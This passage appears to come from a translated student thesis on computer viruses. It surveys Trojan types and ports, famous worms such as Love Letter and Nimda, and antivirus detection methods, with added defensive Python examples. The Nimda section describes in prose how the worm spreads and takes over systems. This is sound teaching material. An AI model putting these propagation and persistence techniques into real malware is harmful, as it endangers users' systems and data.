Most Trojans spread by e-mail. A hacker, or the Trojan's owner, attaches the Trojan to an e-mail and sends it. When the user opens the attachment, or in some cases merely views the message, the Trojan can be activated, enter the system and carry out its functions.

3/. Trojans planted by direct access:

Even a computer with the best protective measures and the best antivirus program can do nothing against someone with direct access who deliberately installs a Trojan on it.

1.5.3. The danger of Trojans

Most people believe a Trojan is not dangerous because their computer still works normally and all their data is intact, whereas a virus might wipe the data or make the machine misbehave. In fact, once a computer is infected with a Trojan, all data on it is at risk. The Trojan's owner usually does not delete files; instead they copy and exploit them: company secrets, Internet accounts, personal accounts. Only when nothing else is left to take might they delete the data. Sometimes a hacker uses the Trojan to install a destructive virus such as CIH. These are just a few examples of what a hacker can do after successfully installing a Trojan.

1.5.4. Classification of Trojans

There are many Trojans, but they fall mainly into the following types:

1/. Remote-access Trojans:

This is currently the most widely used type. Its main function is to open a port on the victim's computer so that the hacker can come back and access it. It is very easy to use: once the victim is infected and the Trojan's owner knows the victim's IP address, the owner has full control of the machine. The exact features depend on the Trojan (key logging, file download and upload, command execution...). Well-known examples of this type: NetBus, Back Orifice.

2/. Keyloggers:

A keylogger records every keystroke to a file; the hacker later connects to the computer and retrieves the file containing everything the user typed. Examples: Kuang keylogger, Hooker, Kuang2.

3/. Password-sending Trojans:

These read all passwords stored in the cache, together with information about the victim's computer, and send them to the hacker. Examples: Barok, Kuang, Bario.

4/. Destructive Trojans:

These have a single task: destroy all files on the computer. Example: CIH. They are extremely dangerous because a single infection is enough to lose all data.

5/. FTP Trojans:

This type opens port 21 on the computer and lets anyone connect without a password, with full rights to download any data.

1.5.5. Purpose of Trojans

Many people think hackers use Trojans only to damage their computer. That is completely wrong. A Trojan is a highly effective tool for collecting information from the victim's machine:
- Credit card and customer information.
- Account details and confidential data.
- E-mail address lists and home addresses.
- Account passwords and anything else about the company.

1.5.6. How Trojans operate

When the victim runs the Trojan file, if it is a remote-access Trojan, the server component waits and listens. As soon as it receives a signal from the client it opens a port through which the hacker can connect, over TCP or UDP. Once the hacker connects to the victim's IP address, they can do whatever the Trojan's feature set supports. If the Trojan is a keylogger or password stealer, it records everything typed on the keyboard and stores it in a file at a fixed path. At some later time the Trojan's owner enters the computer through the backdoor the Trojan opened and retrieves that file. Trojans with a built-in sending routine instead mail the file to a predetermined e-mail address. A destructive Trojan loads when Windows starts and performs its file deletion. Some Trojans arrange to load at Windows startup by modifying win.ini or system.ini, or by editing the registry.

1.5.7. Ports used by some common Trojans

Name                    Port    Name                     Port
Satanz Backdoor         666     Silencer                 10001
Shockrave               1981    Shivka-Burka             1600
WebEx                   1001    SpySender                1807
Doly Trojan             1011    Psyber Stream Server     1170
Ultors Trojan           1234    VooDoo Doll              1245
FTP 99CMP               1492    BackDoor                 1999
Trojan Cow              2001    Ripper                   2023
Bugs                    2115    Deep Throat              2140
The Invasor             2140    Phineas Phucker          2801
Masters Paradise        30129   Portal of Doom           3700
WinCrash                4092    ICQ Trojan               4590
Sockets de Troie        5000    Sockets de Troie 1.x     5001
Firehotcker             5321    Blade Runner             5400
Blade Runner 2.x        5402    Robo-Hack                5569
Blade Runner 1.x        5401    DeepThroat               6670
DeepThroat              6771    GateCrasher              6969

A port number is only a hint. Most of these tools let the operator choose the listening port, so a machine with none of these ports open is not proven clean, and a legitimate service may happen to use one of them; a hit in this table is a reason to inspect the listening process, not a verdict.

1.6. INTERNET WORM
1.6.1. Overview

An Internet worm is the type of virus with the widest, fastest and most common spread today. A worm combines the destructiveness of a virus with the stealth of a Trojan, and above all the frightening propagation its author equips it with turns it into a destroyer with a formidable weapon. Typical examples are Melissa and Love Letter. With such propagation they paralyse entire groups of servers and choke Internet links.

Originally, the term worm referred only to viruses that propagated by collecting the addresses in the address book of the machine they had infected and mailing themselves to every address found. Those addresses usually belong to friends, relatives or customers of the owner of the infected machine. Dangerously, the virus can forge the sender address to be the machine owner's or any other individual's; moreover, the e-mails it sends usually have sensational or enticing content so that the recipient opens the attached virus file. Some viruses even quote the content of an e-mail found in the victim's mailbox to build the body of the forged message, which makes it look more genuine and the recipient easier to fool. All of this happens without the owner noticing. Repeating the same process on each new victim, a worm can spread worldwide at an exponential rate, which explains how Melissa and Love Letter reached tens of millions of computers within a few hours. The name, worm or "Internet worm", evokes computer viruses crawling from machine to machine along the "branches" of the Internet.

Because of this fast and broad spread, worm authors often add special capabilities, such as a preset date and time at which all victim machines (millions of them) simultaneously attack one address. Worms can also carry backdoors to drop on the victim, which let the worm's owner access the victim's machine and do anything a local user could, without authorisation.

Today the notion of worm has broadened to include viruses that spread through peer-to-peer file-sharing networks, USB drives or instant-messaging services (chat), and especially viruses that exploit software vulnerabilities to spread. Software (above all operating systems and the services running on them) always harbours bugs and security holes, such as buffer overflows, which cannot always be found easily. Once a hole is discovered, viruses that exploit it to silently infect remote computers appear shortly afterwards, with the owner entirely unaware. From those machines the worm crawls on to other machines on the Internet in the same way. The danger of Internet worms can be seen from the MyDoom worm.

Date the first MyDoom worm appeared: 26/01/2004
Date it reached Vietnam: 27/01/2004

The MyDoom attack peaked on 31/01/2004, when millions of MyDoom-infected e-mails were sent simultaneously to Yahoo's website and congested its links. A firewall and filter were immediately set up to block and discard all e-mails with the subjects Test, Hi, Hello, Mail Delivery System, Mail Transaction Failed, Server Report, Status and Error, even though Yahoo itself commonly uses these subjects. Despite the timely defences, Yahoo's website was under a DoS (Denial of Service) attack from 8:17 to 12:10 on 31/01/2004, and typing http://www.mail.yahoo.com/ was redirected to http://www.search.com/. Almost all activity on the site was paralysed.

The new variant is called MyDoom.B (also known as Novarg.A, Mimail.k) and can block access to websites that provide antivirus software. The original MyDoom program only generated a wave of junk mail and prepared for a coordinated attack on the website of SCO Group Inc. from 01/02 to 12/02/2004. The new variant MyDoom.B adds a command to attack Microsoft's website as well. MyDoom was written so as not to target e-mail addresses belonging to government agencies, certain universities and certain computer security companies, including Symantec. Computers running Microsoft Windows XP are at the highest risk of infection. According to technology experts, the financial damage caused by MyDoom, including the disruption of Internet services, is estimated in the billions of dollars.

Some figures:
- The first MyDoom removal tool was published on 28/01/2004 (by Symantec).
- 160,000 infected e-mails were sent to one company in 60 minutes in the USA.
- The most ports opened: from port 3127 to port 3198 (over 70 ports).
- Symantec counted 2,100 different systems scanning the Internet for the backdoors MyDoom created.
- 50,000 computer systems were infected and remotely controlled, ready for a coordinated attack.
- 300 million infected messages were sent, 1/12 of all e-mail carried on the Internet over two days.
- 500,000 computers were infected in just 3 days after the worm was detected.
- 142 countries were affected.

1.6.2. Stages in the development of Internet worms

By analysing typical worms from each stage of their development, we can see the principles on which worms are built, how fast this kind of virus evolves, and how dangerous it is.

1.6.2.1. The Morris worm
The Morris worm was the first computer worm distributed over the Internet and the first to attract significant attention from the mass media. Its author was Robert Tappan Morris, a student at Cornell University. It was released onto the network on 2 November 1988 from MIT; it was launched from MIT to disguise the fact that it originated at Cornell. (Robert Tappan Morris is now a professor at MIT.)

The critical mistake that turned the worm from a potentially harmless intellectual experiment into a destructive denial-of-service attack lay in the propagation mechanism. The worm decided whether to infect a new computer by asking whether a copy was already running there. Had it done only that, removal would have been easy: anyone could run a process that answered "yes" when asked whether a copy existed, and the worm would stay away. To prevent this, Morris designed the worm to install itself anyway one time in seven, regardless of the result of the check. That rate proved far too high: the worm spread rapidly and infected some computers many times over. It is estimated that about 6,000 Unix machines were infected. Paul Graham has said: "I was there when this statistic was cooked up, and this was the recipe: someone guessed that there were about 60,000 computers attached to the Internet, and that the worm might have infected ten percent of them." The damage was estimated at between 10 and 100 million US dollars.

Robert Morris was tried and convicted of violating the Computer Fraud and Abuse Act of 1986. After appeal, he was sentenced to three years of probation, 400 hours of community service and a fine of 10,050 US dollars. The Morris worm is sometimes called the "Great Worm" because of the devastating effect it had on the Internet at the time, both in total system downtime and in its psychological impact on perceptions of the security and reliability of the Internet.

1.6.2.2. The Kakworm
Kakworm (KAK) is a worm built to exploit a vulnerability in the security of Internet Explorer and Outlook Express. Microsoft released a patch for this vulnerability (security bulletin MS99-032) and it must be applied immediately; browsers and mail clients other than Microsoft's are not affected. KAK is embedded in the HTML signature of the message. The user does not see it because it contains no visible text (KAK is written in JavaScript). The user does not have to open any attachment or take any action to activate KAK: merely viewing the message is enough for the worm to enter the system. Once activated, KAK saves the file KAK.HTA into the Windows Startup folder. The next time the computer boots, KAK.HTA runs and creates its own copy in the Windows directory. On the first day of each month, after 5 PM, the worm displays the message "Kagou-Anti-Krosoft says not today!" and then shuts the computer down. KAK was built on BubbleBoy, the first worm that could spread without the user opening an attachment.

1.6.2.3. The Love Letter worm

In its original form the worm mails itself to other users as an e-mail attachment. The subject is "ILOVEYOU" and the body reads "kindly check the attached LOVELETTER coming from me." The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs (a double extension, .txt.vbs). When the attachment is clicked it runs (assuming Windows Scripting Host is installed) and the infection cycle starts again. The doubled extension is essential to the worm, which exploits how file names are displayed: by default, mail clients and Explorer folder views hide the extensions of known file types. On a computer with default settings the attachment therefore appears as LOVE-LETTER-FOR-YOU.TXT, apparently a text file rather than an executable.

In operation the worm performs several actions:
- It checks for the file WinFAT32.exe in the Internet Explorer download directory. If it is not found, the worm changes the Internet Explorer start page in the registry to one of several websites from which WIN-BUGSFIX.exe is downloaded and set to run on the next boot.
- It copies itself to two locations from which it runs at every restart.
- It tries to send itself to every address in the Outlook address book.
- It searches for all files with the extensions VBS, VBE, JS, JSE, CSS, WSH, SCT or HTA; each one found is overwritten with the virus and renamed with the .VBS extension. Image files with the extensions JPG or JPEG are also overwritten with the virus, and .VBS is appended to their names.

Media files with the extensions MP2 and MP3 are copied to a new file of the same name with .VBS appended. The worm looks for an mIRC client and, if found, drops a copy of itself and an HTML file designed to send the worm over mIRC.

The original virus had great influence, and variants developed and spread quickly. More than 20 variants were reported, and the real number was certainly higher. Some of the most notable:
- Subject "fwd:", no body, attachment: very funy.vbs.
- Subject "Mothers Day Order Confirmation", with a body saying that the recipient's card had been charged 326.92 USD for the Mother's Day special, that a detailed invoice was attached and should be printed and kept in a safe place, signed mothersday@subdimension.com; attachment: mothersday.vbs.
- Subject "Virus ALERT!!!", from support@symantec.com, with a body addressed to "Dear Symantec customer" saying that Symantec's AntiVirus Research Center began receiving reports of VBS.LoveLetter early on the morning of 4 May 2000 GMT, that the worm appeared to originate in the Asia Pacific region, and that it was spreading widely with hundreds of thousands of machines reported infected; attachment: protect.vbs.
- Subject "How to protect yourself from the ILOVEYOU bug!", body "Here's the easy way to fix the love virus.", attachment: Virus-Protection-Instructions.vbs.
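Both the ICQ trick described in 1.5.2 (an .exe carrying a bitmap icon) and Love Letter's double extension work because the user judges a file by its displayed name. The Python snippet below is an added example, not code from the thesis: it judges an attachment by its last extension and by its content (every DOS/Windows executable starts with the "MZ" signature), on constructed sample names and bytes. The extension sets are assumptions chosen for the demonstration, not a complete list.

```python
"""Judging an attachment by what it is, not by the name it shows."""
import re
from typing import List

# Extensions Windows executes or hands to a script host (assumed list for the example).
EXECUTABLE_EXTS = {"exe", "com", "scr", "pif", "bat", "cmd", "vbs", "vbe",
                   "js", "jse", "wsh", "wsf", "hta", "sct"}
# Extensions whose content is legitimately an MZ executable.
NATIVE_EXE_EXTS = {"exe", "com", "scr", "pif", "dll", "sys", "ocx", "cpl"}
# Harmless-looking extensions used as the decoy half of a double extension.
DECOY_EXTS = {"txt", "doc", "xls", "jpg", "jpeg", "gif", "bmp", "mp3", "pdf", "htm", "html"}


def real_extension(name: str) -> str:
    """The last extension is the only one Windows acts on."""
    _stem, dot, ext = name.rpartition(".")
    return ext.lower() if dot else ""


def displayed_name(name: str) -> str:
    """What Explorer/Outlook show with 'Hide file extensions for known file types' on."""
    stem, dot, _ext = name.rpartition(".")
    return stem if dot else name


def looks_like_executable(data: bytes) -> bool:
    """Every DOS/Windows executable starts with the 'MZ' signature, whatever its name."""
    return data[:2] == b"MZ"


def check_attachment(name: str, data: bytes) -> List[str]:
    """Return the reasons this attachment should not be opened as what it claims to be."""
    findings: List[str] = []
    ext = real_extension(name)
    shown = displayed_name(name)
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable or script extension .{ext}")
    if ext in EXECUTABLE_EXTS and real_extension(shown) in DECOY_EXTS:
        findings.append(f"double extension: displayed as {shown!r}, really .{ext}")
    if looks_like_executable(data) and ext not in NATIVE_EXE_EXTS:
        findings.append("content is an MZ executable but the extension says otherwise")
    if re.search(r"\s{5,}\.\w+$", name):
        findings.append("whitespace padding pushes the real extension out of view")
    return findings


# Constructed samples: names and bytes made up for the example.
SAMPLES = {
    "LOVE-LETTER-FOR-YOU.TXT.vbs": b'MsgBox "hello"',
    "holiday.bmp.exe": b"MZ\x90\x00\x03\x00",   # the ICQ trick: an .exe with a bitmap icon
    "picture.bmp": b"MZ\x90\x00\x03\x00",       # renamed executable, no double extension
    "report.txt": b"Quarterly figures attached.",
}

if __name__ == "__main__":
    for sample_name, content in SAMPLES.items():
        print(sample_name, "->", check_attachment(sample_name, content) or ["looks consistent"])
```

The content check is the one that survives renaming: a .bmp that starts with MZ is an executable no matter what icon or name it carries, which is exactly the ICQ case above.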

1.6.2.4. The Melissa worm
Melissa is a combination of macro virus and e-mail worm. It was first found on Friday, 26 March 1999, and spread around the world very quickly. Essentially, when a user clicks the .DOC file attached to an e-mail, the macro virus runs. One of the first things it does is compose and send a message to the first 50 addresses in the Outlook address book. The subject is "Important Message From <your username>" and the body reads: "Here is that document you asked for ... don't show anyone else ;-)". Attached to this message is the document currently being worked on. Since Melissa is a virus and infects NORMAL.DOT, it can send infected documents out that look like something important from the infected computer. In the rare case where the minute of the hour equals the day of the month (for example 8:08 on the 8th), the virus inserts the text "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." into the document. Melissa's initial distribution was in a file called LIST.DOC, which contained passwords to X-rated (pornographic) websites.

1.6.2.5. The Nimda worm
Nimda is one of the most sophisticated worms, built as a blend of techniques: it infects files, spreads through websites, through e-mail, and by exploiting local network shares. It infects all versions of Windows from Windows 95 to Windows 2000 as well as Microsoft IIS. Nimda also spreads through improperly secured websites, so browsers are infected simply by viewing a web page. Finally, Nimda was the first worm to use users' computers to scan the local network for vulnerable machines behind the firewall to attack (earlier worms spread only through servers). Nimda uses several well-known weaknesses in Microsoft IIS servers, some of which are described at:
http://www.microsoft.com/tech/security/bulletin/ms00-078.asp
http://www.microsoft.com/tech/security/bulletin/ms01-020.asp

Nimda uses the following propagation methods:
- Client to client via e-mail and via infected .EXE files.
- Client to client via open network shares.
- Web server to client via browsing of compromised websites.
- Client to web server via active scanning and exploitation of the Microsoft IIS 4.0/5.0 directory traversal vulnerability.
- Client to web server via scanning for the backdoors left by the Code Red II and sadmind/IIS worms.

1/. File infection:

Nimda behaves like any standard file infector. It searches for .EXE files and adds itself to them as a resource. When such an infected .EXE is downloaded by other users, its reach grows. Likewise, if an infected file sits on a machine in a local network, shared files spread Nimda further. When an infected file runs, it infects other files; Nimda deletes its working file afterwards, but cannot always do so, in which case it creates WININIT.INI with commands to delete the file at the next Windows startup. Nimda locates the .EXE files to infect by searching the paths listed under the following registry keys:
[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]
[SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
Notably, WINZIP32.EXE is not infected.

2/. As an e-mail worm:

In another respect Nimda behaves like other worms. It searches the mail client's address lists on the victim's machine, and HTML files on the computer, for e-mail addresses and then mails itself to them as an attachment. The message has two MIME parts. The first is declared as type text/html but contains nothing. The second is declared as type audio/x-wav but contains an attached file named README.EXE, which is a program. Nimda uses its own SMTP engine to send the mail.

3/. As a web worm:

Nimda scans the Internet for Microsoft IIS web servers. When a server is found, if it has an exploitable vulnerability, Nimda enters and modifies random web pages on the server (as well as .EXE files on it). These modifications let the worm spread to users who merely browse the website. To do so Nimda searches the source of .HTML and .ASP files and, when found, appends a JavaScript fragment to the end of them. This JavaScript opens a file named README.EML when the page is loaded by a browser. README.EML is another form of the worm, placed in the directory where the modified .HTML files were found. Browsers that have not been patched execute this file automatically without the user clicking anything; the user does not see the worm run because it runs in a minimised window.

Infection through shared files. To spread to computers on a local network, Nimda searches for other computers with open file shares. When it finds one, it copies its hidden file (RICHED20.DLL) onto the other computer into every directory where document files with the extension .DOC or .EML are found. When those files are later opened with Word, WordPad or Outlook, the hidden RICHED20.DLL is loaded and executed automatically, infecting that computer. At the same time Nimda tries to replace the genuine RICHED20.DLL of Windows and drops .EML files (sometimes .NWS) into the directories it can reach.

Nimda on the victim's computer. Nimda usually arrives as a file called README.EXE attached to an e-mail, but it may appear under any other name. The file has the .EXE extension and is a little over 50 KB in its basic original form. When run, it first copies itself to a temporary directory under a random name of the form MEP*.TMP (where * stands for random characters). Then, from that directory, it executes itself with the command-line option -dontrunold. The worm then determines whether it can delete the file in the temporary directory. If it can, the worm builds its primary infection tool: a MIME-encoded copy of itself that can be attached to multi-part messages. This new copy is given a random name and stored in a temporary directory. Now it is ready to do its work. Finally, the worm copies itself to RICHED20.DLL in the Windows\System directory and sets the hidden and system attributes on the file.

When executed, Nimda searches for shared network resources and starts scanning the shared files. It looks for files with the extensions .DOC and .EML; where it finds them, RICHED20.DLL is copied into their directory so that it runs when an OLE component is loaded on the remote machine, which then infects that machine.

Some copies of the worm also do the following:
- Modify the key [Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] so that hidden files are no longer displayed. This hides the worm in Explorer.
- Enable the Guest account on the infected system and add it to the Administrators group. Using this account it creates a share "C$" with full access rights.
- Delete the subkeys of [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security], which disables share security.

Chapter 2. VIRUS IDENTIFICATION AND DETECTION
2.1. VIRUS IDENTIFICATION TECHNIQUES
2.1.1. Exact signature matching (signature-based detection)
This is the exact identification of viruses for which the antivirus (AV) program holds a sample. Simply put: the files to be checked are analysed and compared against the known virus samples; if a fragment of virus code is found, the file may be infected and the software then removes the virus from it. Exact signature matching forces AV software to update its database continuously in order to recognise new viruses and their variants. Every antivirus product uses this technique to scan for viruses, and the more signatures it has, the more viruses it can remove. All the other identification techniques were created to compensate for the shortcomings of this one.
+ Advantages of exact signature matching: high identification accuracy with few false alarms, and better disinfection results. Approximate techniques can only suggest that a file may be a virus; exact identification allows the symptoms that accompany the virus to be removed and the system restored.

+ Disadvantages of exact signature matching: its greatest weakness is that it cannot cope with new or not-yet-seen viruses for which no signature exists. The database of virus samples is large, which makes the antivirus program large. The technique demands continuous database updates, which cost time, money and effort.

2.1.2. Identification by representative hash

Any file is in essence a long sequence of bytes, so we can treat it as a string and compute a hash of the file. By the nature of a cryptographic hash, this value is practically unique to the file. Once we have a sample of a virus we can derive a hash from it; deciding whether a file is that virus then amounts to hashing the file and comparing the result with the sample's hash. There are two ways to take a hash-based signature: hash the whole file, or hash only an important part of it.

2.1.2.1. Hashing the whole file

The simplest way to create a characteristic signature for a virus sample is to hash the entire sample file. The hash algorithms commonly used for this are MD5, SHA-1, SHA-256 and so on, whose collision probability is low enough for the hash to serve as a signature for one file.
+ Advantage: simple to implement.
+ Disadvantage: computationally expensive; hashing is slow, especially for large files. This weakness shows clearly when scanning every file on the system. A whole-file hash also matches only that exact byte sequence: changing a single byte anywhere in the file gives a different hash, so every variant needs its own entry.

2.1.2.2. Hashing an important part of the file

To overcome this drawback, only a hash of some important part of the file is computed. For executable files (.exe, .com, .dll, .sys ...) the important part might be the PE (Portable Executable) header, or the region around the program's entry point. Which region counts as important is a matter of each AV vendor's own strategy.
+ Advantage: hashing is considerably faster than hashing the whole file.
+ Disadvantage: more complex to implement than whole-file hashing. Not every file format has a well-defined region of characteristic information, so the method applies only to certain formats.

2.1.3. String scanning

This is the oldest technique and is still in widespread use in most antivirus products today: the scanner looks for a given byte string at a given offset, in one of two ways.

2.1.3.1. Fully static offset

In this approach we simply specify which string, at which offset, and use this signature to decide whether a file is the virus. The string is chosen according to the particular virus, so it differs from one virus to another.
+ Advantage: updating a signature and scanning are easy to implement.

+ Disadvantage: this kind of scan is easily defeated by a virus family. For example, if one inserts or deletes a single byte in the virus binary (while keeping the virus working) anywhere before the signature's offset, the method inevitably fails to recognise the modified sample.

2.1.3.2. Relative offset

In this approach the offset is computed relative to some component of the file (such as the Entry Point or the n-th section). The rule can be written as an offset of the form Entry Point + some number. Consider an example that compares the structure of two different variants of the worm w32.funnyIM.worm. First we determine the Entry Point address of the two samples:

(Figure omitted in this extract: the two samples viewed at their Entry Points, and the strings of the two virus samples.)

We obtain two identical strings at two different offsets (from here on, strings taken from binary files are written as sequences of hexadecimal numbers for easier reading):

(Tables omitted in this extract.) From the two tables of figures we can build one common signature for both variants:
String: 64 75 6E 67 63 6F 69 00
Offset: Entry Point address + 60
+ Advantage: this extension widens the range of viru ses recognised. For instance, if some bytes are modified as above but the bytes following the Entry Point remain as in the original, the sample is still recognised by a signature updated this way.
+ Disadvantage: an update needs more information than the static-offset method, and the scan engine must have a more complex mechanism to support this kind of scanning. Because the offset is taken relative to part of a suitable file format, the method is limited to certain file formats.
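To make the three techniques concrete (whole-file hash in 2.1.2.1, partial hash over the PE header and entry-point region in 2.1.2.2, and absolute versus Entry Point-relative string signatures in 2.1.3), here is an added Python example; it is not code from the thesis or from any antivirus engine. It builds a minimal, non-runnable PE image as a constructed fixture, reuses the string from the w32.funnyIM.worm example above (64 75 6E 67 63 6F 69 00 at Entry Point + 60), and compares three samples: the original, the same file with data appended at the end, and a copy with one byte inserted before the code, which is the case that defeats a static offset. The code bytes and the PE field values are assumptions made for the fixture.

```python
"""Signature matching on a PE file: whole-file hash, partial hash over the PE
header plus entry-point region, and byte-string signatures at an absolute
offset versus an entry-point-relative offset."""
import hashlib
import struct
from typing import Dict, Tuple


def build_pe(code: bytes, pad_before_code: int = 0) -> bytes:
    """Constructed fixture: a minimal, NOT runnable PE32 image with one section
    whose raw data starts `pad_before_code` bytes after the headers. Different
    padding stands in for two variants that hold the same code at different
    file offsets."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_opt = 224                                       # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x0102)
    headers_len = e_lfanew + 4 + 20 + size_opt + 40      # DOS + "PE\0\0" + COFF + opt + 1 section
    raw_ptr = headers_len + pad_before_code
    code_rva = 0x1000
    # Magic, linker ver, SizeOfCode, SizeOfInitData, SizeOfUninitData,
    # AddressOfEntryPoint (an RVA, not a file offset), BaseOfCode, BaseOfData,
    # ImageBase, SectionAlignment, FileAlignment; the rest of the header is zero.
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 0, 0, len(code), 0, 0,
                      code_rva, code_rva, 0, 0x400000, 0x1000, 0x200)
    opt += b"\0" * (size_opt - len(opt))
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(code), code_rva,
                                           len(code), raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = dos_header + b"PE\0\0" + coff + opt + section
    return image + b"\0" * pad_before_code + code


def pe_layout(image: bytes) -> Tuple[int, int, int]:
    """Return (e_lfanew, end of the section table, file offset of the entry point),
    translating the entry-point RVA through the section table."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    n_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 24 + 16)[0]
    sec_table = e_lfanew + 24 + size_opt
    for i in range(n_sections):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", image, sec_table + 40 * i + 8)
        if vaddr <= entry_rva < vaddr + max(vsize, rawsize):
            return e_lfanew, sec_table + 40 * n_sections, rawptr + (entry_rva - vaddr)
    raise ValueError("entry point lies outside every section")


def full_file_hash(image: bytes) -> str:
    return hashlib.sha256(image).hexdigest()


def partial_hash(image: bytes, window: int = 64) -> str:
    """Hash only the PE header block and `window` bytes from the entry point."""
    e_lfanew, headers_end, ep = pe_layout(image)
    h = hashlib.sha256()
    h.update(image[e_lfanew:headers_end])
    h.update(image[ep:ep + window])
    return h.hexdigest()


def match_absolute(image: bytes, offset: int, sig: bytes) -> bool:
    return image[offset:offset + len(sig)] == sig


def match_ep_relative(image: bytes, delta: int, sig: bytes) -> bool:
    try:
        ep = pe_layout(image)[2]
    except ValueError:
        return False
    return image[ep + delta:ep + delta + len(sig)] == sig


# The signature from the w32.funnyIM.worm example: "dungcoi\0" at Entry Point + 60.
SIGNATURE = bytes.fromhex("64756E67636F6900")
SIG_DELTA = 60

# Constructed "virus" code: the signature string sits 60 bytes into the code.
CODE = b"\x55\x8B\xEC" + b"\x90" * 57 + SIGNATURE + b"\xC3"
SAMPLE_A = build_pe(CODE)                         # the sample the signature was taken from
SAMPLE_B = SAMPLE_A + b"overlay data"             # same binary with data appended
SAMPLE_C = build_pe(CODE, pad_before_code=1)      # one byte inserted before the code


def verdicts(image: bytes) -> Dict[str, bool]:
    """The four checks from the text, applied to one image (offset 412 is where
    the signature sits in SAMPLE_A: entry point 352 + 60)."""
    return {
        "absolute_offset_412": match_absolute(image, 412, SIGNATURE),
        "entry_point_plus_60": match_ep_relative(image, SIG_DELTA, SIGNATURE),
        "same_full_hash_as_A": full_file_hash(image) == full_file_hash(SAMPLE_A),
        "same_partial_hash_as_A": partial_hash(image) == partial_hash(SAMPLE_A),
    }


if __name__ == "__main__":
    for name, img in (("A", SAMPLE_A), ("B", SAMPLE_B), ("C", SAMPLE_C)):
        print(name, "entry point at file offset", pe_layout(img)[2], verdicts(img))
```

Sample B shows what the partial hash buys: appending data (an overlay, a changed stub) breaks the whole-file hash but not the header/entry-point hash. Sample C shows the static-offset failure from 2.1.3.1 and why the Entry Point-relative signature of 2.1.3.2 still fires; its partial hash differs too, because the section table itself changed, which is the honest limit of that method.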

2.1.4. Suspicious-behaviour identification

Identifying suspicious behaviour is an "intelligent" feature that not every antivirus product has. Put simply, the antivirus program monitors abnormal activity in the system in order to detect viruses not yet in its database, or malicious software in general, warn the user, isolate the virus, and offer to send the sample to the vendor for analysis and inclusion in the next database update.

Antivirus products usually let the user enable or disable this feature and set its level (aggressive, medium or low; the default is usually medium), because on less powerful computers it can consume resources and slow the system down.

2.1.5. Continuous monitoring

Antivirus software usually performs continuous, real-time monitoring to protect the system. Real-time monitoring scans every file the system accesses, and every file from the moment it is copied onto the system, using signature matching and suspicious-behaviour monitoring.

2.1.6. Combining methods

Relying solely on signature matching, an antivirus product fails because it deals only with the consequences, the infected files, and not with the cause of the infection. With some weaker products one sees the following: the product removes a virus completely, yet at the next boot of the operating system it detects the same virus again. This is usually not a case of recognising but failing to remove the virus; rather, the virus was reinfected because the product could not monitor the operating system's boot process from the moment the BIOS hands over control. The product must therefore combine every method of monitoring and blocking the virus's behaviour. A virus may plant commands in the registry to reinfect from some background file or to disable the antivirus; it may also arrange to be downloaded again as soon as the browser connects to the Internet. So antivirus software must combine all methods of blocking viruses. These factors are what separate today's antivirus products, the well-known ones from the countless others, since even a student can write an antivirus if they bother to collect virus samples from the Internet.

2.2. VIRUS DETECTION METHODS
2.2.1. Scanning (scanner)

This is the earliest method and is used by almost every antivirus program. With this method antivirus programs regularly update the characteristic signatures of each virus and then examine files. During the scan the program compares the known virus signatures with the data of each file and thereby detects any virus in the file. Programs using this method must therefore update their virus signatures regularly; otherwise they cannot detect new viruses.

2.2.2. Checksum

This is essentially the data-integrity check used in communications, applied by some antivirus programs. The principle is to detect change in the objects being checked. Programs using this method generate a value called a checksum and periodically verify it against the current object (file, boot area). If a virus has penetrated the object, the program raises an alarm. A virus may fool checksum-based programs by producing a forged checksum; to prevent this, such programs use cryptographic techniques to create checksums the virus cannot forge. The weakness of this method is that the checks must be run regularly, which takes a lot of time, and that it cannot distinguish a legitimate change from a change caused by a virus, so the user constantly has to deal with false alarms. It also lets a virus survive if the virus was already present when the first checksum was taken. A further drawback is that it cannot be used to detect macro viruses, since .DOC files are constantly changed by the user.
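As an added illustration of the checksum method (not from the thesis), the Python code below keeps a baseline of keyed hashes (HMAC-SHA256) rather than plain checksums: a virus that rewrites a file cannot update the stored value to match without the key, provided the key and the baseline are kept off the disk being checked (for example on write-protected media). The "files" are a constructed in-memory dictionary so the example runs anywhere; the verify routine reports the three outcomes a practitioner has to act on (modified, new, missing), and the usage covers the false-alarm and wrong-key cases from the paragraph above.

```python
"""Keyed integrity baseline for the checksum method."""
import hashlib
import hmac
from typing import Dict

Objects = Dict[str, bytes]   # path (or "BOOT_SECTOR") -> current bytes


def keyed_checksum(key: bytes, data: bytes) -> str:
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def build_baseline(objects: Objects, key: bytes) -> Dict[str, str]:
    """Take the baseline on a machine known to be clean: a virus already present
    when this runs becomes part of the 'good' state (the caveat in the text)."""
    return {path: keyed_checksum(key, data) for path, data in objects.items()}


def verify(objects: Objects, baseline: Dict[str, str], key: bytes) -> Dict[str, str]:
    """Classify every object as ok / modified / new / missing."""
    report: Dict[str, str] = {}
    for path, data in objects.items():
        if path not in baseline:
            report[path] = "new"
        elif hmac.compare_digest(keyed_checksum(key, data), baseline[path]):
            report[path] = "ok"
        else:
            report[path] = "modified"
    for path in baseline:
        if path not in objects:
            report[path] = "missing"
    return report


# Constructed sample objects; a real run would read files and boot sectors.
KEY = b"secret kept on write-protected media, not on the checked disk"
CLEAN: Objects = {
    "C:/COMMAND.COM": b"MZ\x90\x00" + b"command interpreter" * 4,
    "C:/WINDOWS/WIN.INI": b"[windows]\r\nload=\r\nrun=\r\n",
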